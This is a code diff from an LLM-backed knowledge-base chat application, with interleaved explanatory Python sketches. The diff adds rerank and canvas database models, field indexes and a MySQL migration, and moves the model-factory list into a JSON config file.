# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
NAME_LENGTH_LIMIT = 2 ** 10
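
`2 ** 10` evaluates to 1024. How the constant is consumed is not visible in this diff; the sketch below assumes it caps a name's length in characters, and the helper `is_name_too_long` is hypothetical.

```python
NAME_LENGTH_LIMIT = 2 ** 10  # 1024, as defined in the new file


def is_name_too_long(name: str, limit: int = NAME_LENGTH_LIMIT) -> bool:
    """Hypothetical check: True when the name has more characters than limit."""
    return len(name) > limit


print(is_name_too_long("a" * 1024))  # False
print(is_name_too_long("a" * 1025))  # True
```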

View File

@ -54,6 +54,7 @@ class LLMType(StrEnum):
EMBEDDING = 'embedding'
SPEECH2TEXT = 'speech2text'
IMAGE2TEXT = 'image2text'
RERANK = 'rerank'
class ChatStyle(StrEnum):
@ -83,3 +84,18 @@ class ParserType(StrEnum):
NAIVE = "naive"
PICTURE = "picture"
ONE = "one"
AUDIO = "audio"
KG = "knowledge_graph"
class FileSource(StrEnum):
LOCAL = ""
KNOWLEDGEBASE = "knowledgebase"
S3 = "s3"
class CanvasType(StrEnum):
ChatBot = "chatbot"
DocBot = "docbot"
KNOWLEDGEBASE_FOLDER_NAME=".knowledgebase"
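
Several hunks compare stored strings against enum members directly, for example `file.source_type == FileSource.KNOWLEDGEBASE` and `llm.model_type == LLMType.RERANK` without `.value`. The sketch below shows why that works for a string-backed enum. It assumes the project's `StrEnum` base behaves like a `str`-mixin `Enum`; the base class itself is not shown in this diff.

```python
from enum import Enum


class FileSource(str, Enum):
    # Same members as the diff; the (str, Enum) base is a stand-in for StrEnum.
    LOCAL = ""
    KNOWLEDGEBASE = "knowledgebase"
    S3 = "s3"


stored = "knowledgebase"  # value as it might come back from a CharField
print(stored == FileSource.KNOWLEDGEBASE)        # True
print(stored == FileSource.KNOWLEDGEBASE.value)  # True
print(FileSource("s3") is FileSource.S3)         # True
```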

View File

@ -21,14 +21,13 @@ import operator
from functools import wraps
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
from flask_login import UserMixin
from playhouse.migrate import MySQLMigrator, migrate
from peewee import (
BigAutoField, BigIntegerField, BooleanField, CharField,
CompositeKey, Insert, IntegerField, TextField, FloatField, DateTimeField,
BigIntegerField, BooleanField, CharField,
CompositeKey, IntegerField, TextField, FloatField, DateTimeField,
Field, Model, Metadata
)
from playhouse.pool import PooledMySQLDatabase
from api.db import SerializedType, ParserType
from api.settings import DATABASE, stat_logger, SECRET_KEY
from api.utils.log_utils import getLogger
@ -145,10 +144,10 @@ def remove_field_name_prefix(field_name):
class BaseModel(Model):
create_time = BigIntegerField(null=True)
create_date = DateTimeField(null=True)
update_time = BigIntegerField(null=True)
update_date = DateTimeField(null=True)
create_time = BigIntegerField(null=True, index=True)
create_date = DateTimeField(null=True, index=True)
update_time = BigIntegerField(null=True, index=True)
update_date = DateTimeField(null=True, index=True)
def to_json(self):
# This function is obsolete
@ -235,7 +234,7 @@ class BaseModel(Model):
def insert(cls, __data=None, **insert):
if isinstance(__data, dict) and __data:
__data[cls._meta.combined["create_time"]
] = utils.current_timestamp()
] = utils.current_timestamp()
if insert:
insert["create_time"] = utils.current_timestamp()
@ -249,7 +248,7 @@ class BaseModel(Model):
return {}
normalized[cls._meta.combined["update_time"]
] = utils.current_timestamp()
] = utils.current_timestamp()
for f_n in AUTO_DATE_TIMESTAMP_FIELD_PREFIX:
if {f"{f_n}_time", f"{f_n}_date"}.issubset(cls._meta.combined.keys()) and \
@ -333,7 +332,7 @@ DB.lock = DatabaseLock
def close_connection():
try:
if DB:
DB.close()
DB.close_stale(age=30)
except Exception as e:
LOGGER.exception(e)
@ -344,7 +343,7 @@ class DataBaseModel(BaseModel):
@DB.connection_context()
def init_database_tables():
def init_database_tables(alter_fields=[]):
members = inspect.getmembers(sys.modules[__name__], inspect.isclass)
table_objs = []
create_failed_list = []
@ -361,6 +360,7 @@ def init_database_tables():
if create_failed_list:
LOGGER.info(f"create tables failed: {create_failed_list}")
raise Exception(f"create tables failed: {create_failed_list}")
migrate_db()
def fill_db_model_object(model_object, human_model_dict):
@ -373,9 +373,9 @@ def fill_db_model_object(model_object, human_model_dict):
class User(DataBaseModel, UserMixin):
id = CharField(max_length=32, primary_key=True)
access_token = CharField(max_length=255, null=True)
nickname = CharField(max_length=100, null=False, help_text="nicky name")
password = CharField(max_length=255, null=True, help_text="password")
access_token = CharField(max_length=255, null=True, index=True)
nickname = CharField(max_length=100, null=False, help_text="nicky name", index=True)
password = CharField(max_length=255, null=True, help_text="password", index=True)
email = CharField(
max_length=255,
null=False,
@ -386,28 +386,32 @@ class User(DataBaseModel, UserMixin):
max_length=32,
null=True,
help_text="English|Chinese",
default="English")
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
index=True)
color_schema = CharField(
max_length=32,
null=True,
help_text="Bright|Dark",
default="Bright")
default="Bright",
index=True)
timezone = CharField(
max_length=64,
null=True,
help_text="Timezone",
default="UTC+8\tAsia/Shanghai")
last_login_time = DateTimeField(null=True)
is_authenticated = CharField(max_length=1, null=False, default="1")
is_active = CharField(max_length=1, null=False, default="1")
is_anonymous = CharField(max_length=1, null=False, default="0")
login_channel = CharField(null=True, help_text="from which user login")
default="UTC+8\tAsia/Shanghai",
index=True)
last_login_time = DateTimeField(null=True, index=True)
is_authenticated = CharField(max_length=1, null=False, default="1", index=True)
is_active = CharField(max_length=1, null=False, default="1", index=True)
is_anonymous = CharField(max_length=1, null=False, default="0", index=True)
login_channel = CharField(null=True, help_text="from which user login", index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
is_superuser = BooleanField(null=True, help_text="is root", default=False)
default="1",
index=True)
is_superuser = BooleanField(null=True, help_text="is root", default=False, index=True)
def __str__(self):
return self.email
@ -422,31 +426,41 @@ class User(DataBaseModel, UserMixin):
class Tenant(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
name = CharField(max_length=100, null=True, help_text="Tenant name")
public_key = CharField(max_length=255, null=True)
llm_id = CharField(max_length=128, null=False, help_text="default llm ID")
name = CharField(max_length=100, null=True, help_text="Tenant name", index=True)
public_key = CharField(max_length=255, null=True, index=True)
llm_id = CharField(max_length=128, null=False, help_text="default llm ID", index=True)
embd_id = CharField(
max_length=128,
null=False,
help_text="default embedding model ID")
help_text="default embedding model ID",
index=True)
asr_id = CharField(
max_length=128,
null=False,
help_text="default ASR model ID")
help_text="default ASR model ID",
index=True)
img2txt_id = CharField(
max_length=128,
null=False,
help_text="default image to text model ID")
help_text="default image to text model ID",
index=True)
rerank_id = CharField(
max_length=128,
null=False,
help_text="default rerank model ID",
index=True)
parser_ids = CharField(
max_length=256,
null=False,
help_text="document processors")
credit = IntegerField(default=512)
help_text="document processors",
index=True)
credit = IntegerField(default=512, index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "tenant"
@ -454,15 +468,16 @@ class Tenant(DataBaseModel):
class UserTenant(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
user_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False)
role = CharField(max_length=32, null=False, help_text="UserTenantRole")
invited_by = CharField(max_length=32, null=False)
user_id = CharField(max_length=32, null=False, index=True)
tenant_id = CharField(max_length=32, null=False, index=True)
role = CharField(max_length=32, null=False, help_text="UserTenantRole", index=True)
invited_by = CharField(max_length=32, null=False, index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "user_tenant"
@ -470,15 +485,16 @@ class UserTenant(DataBaseModel):
class InvitationCode(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
code = CharField(max_length=32, null=False)
visit_time = DateTimeField(null=True)
user_id = CharField(max_length=32, null=True)
tenant_id = CharField(max_length=32, null=True)
code = CharField(max_length=32, null=False, index=True)
visit_time = DateTimeField(null=True, index=True)
user_id = CharField(max_length=32, null=True, index=True)
tenant_id = CharField(max_length=32, null=True, index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "invitation_code"
@ -494,12 +510,14 @@ class LLMFactories(DataBaseModel):
tags = CharField(
max_length=255,
null=False,
help_text="LLM, Text Embedding, Image2Text, ASR")
help_text="LLM, Text Embedding, Image2Text, ASR",
index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
def __str__(self):
return self.name
@ -519,18 +537,22 @@ class LLM(DataBaseModel):
model_type = CharField(
max_length=128,
null=False,
help_text="LLM, Text Embedding, Image2Text, ASR")
fid = CharField(max_length=128, null=False, help_text="LLM factory id")
help_text="LLM, Text Embedding, Image2Text, ASR",
index=True)
fid = CharField(max_length=128, null=False, help_text="LLM factory id", index=True)
max_tokens = IntegerField(default=0)
tags = CharField(
max_length=255,
null=False,
help_text="LLM, Text Embedding, Image2Text, Chat, 32k...")
help_text="LLM, Text Embedding, Image2Text, Chat, 32k...",
index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
def __str__(self):
return self.llm_name
@ -540,23 +562,27 @@ class LLM(DataBaseModel):
class TenantLLM(DataBaseModel):
tenant_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
llm_factory = CharField(
max_length=128,
null=False,
help_text="LLM factory name")
help_text="LLM factory name",
index=True)
model_type = CharField(
max_length=128,
null=True,
help_text="LLM, Text Embedding, Image2Text, ASR")
help_text="LLM, Text Embedding, Image2Text, ASR",
index=True)
llm_name = CharField(
max_length=128,
null=True,
help_text="LLM name",
default="")
api_key = CharField(max_length=255, null=True, help_text="API KEY")
default="",
index=True)
api_key = CharField(max_length=1024, null=True, help_text="API KEY", index=True)
api_base = CharField(max_length=255, null=True, help_text="API Base")
used_tokens = IntegerField(default=0)
used_tokens = IntegerField(default=0, index=True)
def __str__(self):
return self.llm_name
@ -569,7 +595,7 @@ class TenantLLM(DataBaseModel):
class Knowledgebase(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
avatar = TextField(null=True, help_text="avatar base64 string")
tenant_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
name = CharField(
max_length=128,
null=False,
@ -578,36 +604,41 @@ class Knowledgebase(DataBaseModel):
language = CharField(
max_length=32,
null=True,
default="English",
help_text="English|Chinese")
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
help_text="English|Chinese",
index=True)
description = TextField(null=True, help_text="KB description")
embd_id = CharField(
max_length=128,
null=False,
help_text="default embedding model ID")
help_text="default embedding model ID",
index=True)
permission = CharField(
max_length=16,
null=False,
help_text="me|team",
default="me")
created_by = CharField(max_length=32, null=False)
doc_num = IntegerField(default=0)
token_num = IntegerField(default=0)
chunk_num = IntegerField(default=0)
similarity_threshold = FloatField(default=0.2)
vector_similarity_weight = FloatField(default=0.3)
default="me",
index=True)
created_by = CharField(max_length=32, null=False, index=True)
doc_num = IntegerField(default=0, index=True)
token_num = IntegerField(default=0, index=True)
chunk_num = IntegerField(default=0, index=True)
similarity_threshold = FloatField(default=0.2, index=True)
vector_similarity_weight = FloatField(default=0.3, index=True)
parser_id = CharField(
max_length=32,
null=False,
help_text="default parser ID",
default=ParserType.NAIVE.value)
default=ParserType.NAIVE.value,
index=True)
parser_config = JSONField(null=False, default={"pages": [[1, 1000000]]})
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted, 1: validate)",
default="1")
default="1",
index=True)
def __str__(self):
return self.name
@ -623,18 +654,22 @@ class Document(DataBaseModel):
parser_id = CharField(
max_length=32,
null=False,
help_text="default parser ID")
help_text="default parser ID",
index=True)
parser_config = JSONField(null=False, default={"pages": [[1, 1000000]]})
source_type = CharField(
max_length=128,
null=False,
default="local",
help_text="where does this document come from")
type = CharField(max_length=32, null=False, help_text="file extension")
help_text="where does this document come from",
index=True)
type = CharField(max_length=32, null=False, help_text="file extension",
index=True)
created_by = CharField(
max_length=32,
null=False,
help_text="who created it")
help_text="who created it",
index=True)
name = CharField(
max_length=255,
null=True,
@ -643,27 +678,31 @@ class Document(DataBaseModel):
location = CharField(
max_length=255,
null=True,
help_text="where is it stored")
size = IntegerField(default=0)
token_num = IntegerField(default=0)
chunk_num = IntegerField(default=0)
progress = FloatField(default=0)
help_text="where is it stored",
index=True)
size = IntegerField(default=0, index=True)
token_num = IntegerField(default=0, index=True)
chunk_num = IntegerField(default=0, index=True)
progress = FloatField(default=0, index=True)
progress_msg = TextField(
null=True,
help_text="process message",
default="")
process_begin_at = DateTimeField(null=True)
process_begin_at = DateTimeField(null=True, index=True)
process_duation = FloatField(default=0)
run = CharField(
max_length=1,
null=True,
help_text="start to run processing or cancel.(1: run it; 2: cancel)",
default="0")
default="0",
index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted, 1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "document"
@ -672,8 +711,7 @@ class Document(DataBaseModel):
class File(DataBaseModel):
id = CharField(
max_length=32,
primary_key=True,
)
primary_key=True)
parent_id = CharField(
max_length=32,
null=False,
@ -687,7 +725,8 @@ class File(DataBaseModel):
created_by = CharField(
max_length=32,
null=False,
help_text="who created it")
help_text="who created it",
index=True)
name = CharField(
max_length=255,
null=False,
@ -696,9 +735,15 @@ class File(DataBaseModel):
location = CharField(
max_length=255,
null=True,
help_text="where is it stored")
size = IntegerField(default=0)
type = CharField(max_length=32, null=False, help_text="file extension")
help_text="where is it stored",
index=True)
size = IntegerField(default=0, index=True)
type = CharField(max_length=32, null=False, help_text="file extension", index=True)
source_type = CharField(
max_length=128,
null=False,
default="",
help_text="where does this document come from", index=True)
class Meta:
db_table = "file"
@ -707,8 +752,7 @@ class File(DataBaseModel):
class File2Document(DataBaseModel):
id = CharField(
max_length=32,
primary_key=True,
)
primary_key=True)
file_id = CharField(
max_length=32,
null=True,
@ -728,10 +772,13 @@ class Task(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
doc_id = CharField(max_length=32, null=False, index=True)
from_page = IntegerField(default=0)
to_page = IntegerField(default=-1)
begin_at = DateTimeField(null=True)
begin_at = DateTimeField(null=True, index=True)
process_duation = FloatField(default=0)
progress = FloatField(default=0)
progress = FloatField(default=0, index=True)
progress_msg = TextField(
null=True,
help_text="process message",
@ -740,44 +787,57 @@ class Task(DataBaseModel):
class Dialog(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
tenant_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
name = CharField(
max_length=255,
null=True,
help_text="dialog application name")
help_text="dialog application name",
index=True)
description = TextField(null=True, help_text="Dialog description")
icon = TextField(null=True, help_text="icon base64 string")
language = CharField(
max_length=32,
null=True,
default="Chinese",
help_text="English|Chinese")
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
help_text="English|Chinese",
index=True)
llm_id = CharField(max_length=128, null=False, help_text="default llm ID")
llm_setting = JSONField(null=False, default={"temperature": 0.1, "top_p": 0.3, "frequency_penalty": 0.7,
"presence_penalty": 0.4, "max_tokens": 215})
"presence_penalty": 0.4, "max_tokens": 512})
prompt_type = CharField(
max_length=16,
null=False,
default="simple",
help_text="simple|advanced")
help_text="simple|advanced",
index=True)
prompt_config = JSONField(null=False, default={"system": "", "prologue": "您好，我是您的助手小樱，长得可爱又善良，can I help you?",
"parameters": [], "empty_response": "Sorry! 知识库中未找到相关内容!"})
similarity_threshold = FloatField(default=0.2)
vector_similarity_weight = FloatField(default=0.3)
top_n = IntegerField(default=6)
top_k = IntegerField(default=1024)
do_refer = CharField(
max_length=1,
null=False,
help_text="it needs to insert reference index into answer or not",
default="1")
help_text="it needs to insert reference index into answer or not")
rerank_id = CharField(
max_length=128,
null=False,
help_text="default rerank model ID")
kb_ids = JSONField(null=False, default=[])
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted, 1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "dialog"
@ -786,7 +846,7 @@ class Dialog(DataBaseModel):
class Conversation(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
dialog_id = CharField(max_length=32, null=False, index=True)
name = CharField(max_length=255, null=True, help_text="conversation name")
name = CharField(max_length=255, null=True, help_text="conversation name", index=True)
message = JSONField(null=True)
reference = JSONField(null=True, default=[])
@ -795,8 +855,8 @@ class Conversation(DataBaseModel):
class APIToken(DataBaseModel):
tenant_id = CharField(max_length=32, null=False)
token = CharField(max_length=255, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
token = CharField(max_length=255, null=False, index=True)
dialog_id = CharField(max_length=32, null=False, index=True)
class Meta:
@ -807,13 +867,85 @@ class APIToken(DataBaseModel):
class API4Conversation(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
dialog_id = CharField(max_length=32, null=False, index=True)
user_id = CharField(max_length=255, null=False, help_text="user_id")
user_id = CharField(max_length=255, null=False, help_text="user_id", index=True)
message = JSONField(null=True)
reference = JSONField(null=True, default=[])
tokens = IntegerField(default=0)
duration = FloatField(default=0)
round = IntegerField(default=0)
thumb_up = IntegerField(default=0)
duration = FloatField(default=0, index=True)
round = IntegerField(default=0, index=True)
thumb_up = IntegerField(default=0, index=True)
class Meta:
db_table = "api_4_conversation"
class UserCanvas(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
avatar = TextField(null=True, help_text="avatar base64 string")
user_id = CharField(max_length=255, null=False, help_text="user_id", index=True)
title = CharField(max_length=255, null=True, help_text="Canvas title")
description = TextField(null=True, help_text="Canvas description")
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type", index=True)
dsl = JSONField(null=True, default={})
class Meta:
db_table = "user_canvas"
class CanvasTemplate(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
avatar = TextField(null=True, help_text="avatar base64 string")
title = CharField(max_length=255, null=True, help_text="Canvas title")
description = TextField(null=True, help_text="Canvas description")
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type", index=True)
dsl = JSONField(null=True, default={})
class Meta:
db_table = "canvas_template"
def migrate_db():
with DB.transaction():
migrator = MySQLMigrator(DB)
try:
migrate(
migrator.add_column('file', 'source_type', CharField(max_length=128, null=False, default="",
help_text="where does this document come from",
index=True))
)
except Exception as e:
pass
try:
migrate(
migrator.add_column('tenant', 'rerank_id',
CharField(max_length=128, null=False, default="BAAI/bge-reranker-v2-m3",
help_text="default rerank model ID"))
)
except Exception as e:
pass
try:
migrate(
migrator.add_column('dialog', 'rerank_id', CharField(max_length=128, null=False, default="",
help_text="default rerank model ID"))
)
except Exception as e:
pass
try:
migrate(
migrator.add_column('dialog', 'top_k', IntegerField(default=1024))
)
except Exception as e:
pass
try:
migrate(
migrator.alter_column_type('tenant_llm', 'api_key',
CharField(max_length=1024, null=True, help_text="API KEY", index=True))
)
except Exception as e:
pass
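Each step in `migrate_db` above tries a schema change and silently ignores any failure, so an unrelated error (a lost connection, a bad column definition) is swallowed as well. A narrower variant can be sketched as follows. This is only an illustration under stated assumptions: it uses the standard-library `sqlite3` module rather than the project's `MySQLMigrator`, and `add_column_if_missing` is a hypothetical helper name, not part of the codebase.

```python
import sqlite3


def add_column_if_missing(conn, table, column, ddl):
    """Add a column; report False if it already exists, re-raise anything else.

    Hypothetical helper for illustration. Identifiers are interpolated directly,
    so it must only be called with trusted, hard-coded names.
    """
    try:
        conn.execute(f"ALTER TABLE {table} ADD COLUMN {column} {ddl}")
        return True
    except sqlite3.OperationalError as e:
        # SQLite reports an existing column as "duplicate column name: <name>".
        if "duplicate column name" in str(e).lower():
            return False
        raise


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE dialog (id TEXT PRIMARY KEY)")

# Running the same migration twice is safe: the second call is a no-op.
first = add_column_if_missing(conn, "dialog", "top_k", "INTEGER DEFAULT 1024")
second = add_column_if_missing(conn, "dialog", "top_k", "INTEGER DEFAULT 1024")
columns = [row[1] for row in conn.execute("PRAGMA table_info(dialog)")]
```

The design point is that only the "already migrated" case is treated as success, while every other failure still surfaces.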


@ -13,16 +13,22 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import time
import uuid
from copy import deepcopy
from api.db import LLMType, UserTenantRole
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
from api.db.services import UserService
from api.db.services.canvas_service import CanvasTemplateService
from api.db.services.document_service import DocumentService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
from api.db.services.user_service import TenantService, UserTenantService
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
from api.utils.file_utils import get_project_base_directory
def init_superuser():
@ -83,285 +89,30 @@ def init_superuser():
tenant["embd_id"]))
factory_infos = [{
"name": "OpenAI",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
}, {
"name": "Tongyi-Qianwen",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
}, {
"name": "ZHIPU-AI",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
},
{
"name": "Ollama",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
}, {
"name": "Moonshot",
"logo": "",
"tags": "LLM,TEXT EMBEDDING",
"status": "1",
}, {
"name": "FastEmbed",
"logo": "",
"tags": "TEXT EMBEDDING",
"status": "1",
}, {
"name": "Xinference",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
},{
"name": "Youdao",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
},{
"name": "DeepSeek",
"logo": "",
"tags": "LLM",
"status": "1",
},
# {
# "name": "文心一言",
# "logo": "",
# "tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
# "status": "1",
# },
]
def init_llm_factory():
llm_infos = [
# ---------------------- OpenAI ------------------------
{
"fid": factory_infos[0]["name"],
"llm_name": "gpt-3.5-turbo",
"tags": "LLM,CHAT,4K",
"max_tokens": 4096,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-3.5-turbo-16k-0613",
"tags": "LLM,CHAT,16k",
"max_tokens": 16385,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "text-embedding-ada-002",
"tags": "TEXT EMBEDDING,8K",
"max_tokens": 8191,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "whisper-1",
"tags": "SPEECH2TEXT",
"max_tokens": 25 * 1024 * 1024,
"model_type": LLMType.SPEECH2TEXT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4",
"tags": "LLM,CHAT,8K",
"max_tokens": 8191,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4-turbo",
"tags": "LLM,CHAT,8K",
"max_tokens": 8191,
"model_type": LLMType.CHAT.value
},{
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4-32k",
"tags": "LLM,CHAT,32K",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4-vision-preview",
"tags": "LLM,CHAT,IMAGE2TEXT",
"max_tokens": 765,
"model_type": LLMType.IMAGE2TEXT.value
},
# ----------------------- Qwen -----------------------
{
"fid": factory_infos[1]["name"],
"llm_name": "qwen-turbo",
"tags": "LLM,CHAT,8K",
"max_tokens": 8191,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "qwen-plus",
"tags": "LLM,CHAT,32K",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "qwen-max-1201",
"tags": "LLM,CHAT,6K",
"max_tokens": 5899,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "text-embedding-v2",
"tags": "TEXT EMBEDDING,2K",
"max_tokens": 2048,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "paraformer-realtime-8k-v1",
"tags": "SPEECH2TEXT",
"max_tokens": 25 * 1024 * 1024,
"model_type": LLMType.SPEECH2TEXT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "qwen-vl-max",
"tags": "LLM,CHAT,IMAGE2TEXT",
"max_tokens": 765,
"model_type": LLMType.IMAGE2TEXT.value
},
# ---------------------- ZhipuAI ----------------------
{
"fid": factory_infos[2]["name"],
"llm_name": "glm-3-turbo",
"tags": "LLM,CHAT,",
"max_tokens": 128 * 1000,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[2]["name"],
"llm_name": "glm-4",
"tags": "LLM,CHAT,",
"max_tokens": 128 * 1000,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[2]["name"],
"llm_name": "glm-4v",
"tags": "LLM,CHAT,IMAGE2TEXT",
"max_tokens": 2000,
"model_type": LLMType.IMAGE2TEXT.value
},
{
"fid": factory_infos[2]["name"],
"llm_name": "embedding-2",
"tags": "TEXT EMBEDDING",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
},
# ------------------------ Moonshot -----------------------
{
"fid": factory_infos[4]["name"],
"llm_name": "moonshot-v1-8k",
"tags": "LLM,CHAT,",
"max_tokens": 7900,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[4]["name"],
"llm_name": "moonshot-v1-32k",
"tags": "LLM,CHAT,",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[4]["name"],
"llm_name": "moonshot-v1-128k",
"tags": "LLM,CHAT",
"max_tokens": 128 * 1000,
"model_type": LLMType.CHAT.value
},
# ------------------------ FastEmbed -----------------------
{
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-small-en-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-small-zh-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
}, {
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-base-en-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
}, {
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-large-en-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "sentence-transformers/all-MiniLM-L6-v2",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "nomic-ai/nomic-embed-text-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 8192,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "jinaai/jina-embeddings-v2-small-en",
"tags": "TEXT EMBEDDING,",
"max_tokens": 2147483648,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "jinaai/jina-embeddings-v2-base-en",
"tags": "TEXT EMBEDDING,",
"max_tokens": 2147483648,
"model_type": LLMType.EMBEDDING.value
},
# ------------------------ Youdao -----------------------
{
"fid": factory_infos[7]["name"],
"llm_name": "maidalun1020/bce-embedding-base_v1",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
},
# ------------------------ DeepSeek -----------------------
{
"fid": factory_infos[8]["name"],
"llm_name": "deepseek-chat",
"tags": "LLM,CHAT,",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
},
{
"fid": factory_infos[8]["name"],
"llm_name": "deepseek-coder",
"tags": "LLM,CHAT,",
"max_tokens": 16385,
"model_type": LLMType.CHAT.value
},
]
for info in factory_infos:
try:
LLMService.filter_delete([(LLM.fid == "MiniMax") | (LLM.fid == "Minimax")])
except Exception as e:
pass
factory_llm_infos = json.load(
open(
os.path.join(get_project_base_directory(), "conf", "llm_factories.json"),
"r",
)
)
for factory_llm_info in factory_llm_infos["factory_llm_infos"]:
llm_infos = factory_llm_info.pop("llm")
try:
LLMFactoriesService.save(**info)
except Exception as e:
pass
for info in llm_infos:
try:
LLMService.save(**info)
LLMFactoriesService.save(**factory_llm_info)
except Exception as e:
pass
for llm_info in llm_infos:
llm_info["fid"] = factory_llm_info["name"]
try:
LLMService.save(**llm_info)
except Exception as e:
pass
LLMFactoriesService.filter_delete([LLMFactories.name == "Local"])
LLMService.filter_delete([LLM.fid == "Local"])
@ -370,16 +121,51 @@ def init_llm_factory():
LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
LLMService.filter_delete([LLMService.model.fid == "QAnything"])
TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
TenantService.filter_update([1 == 1], {
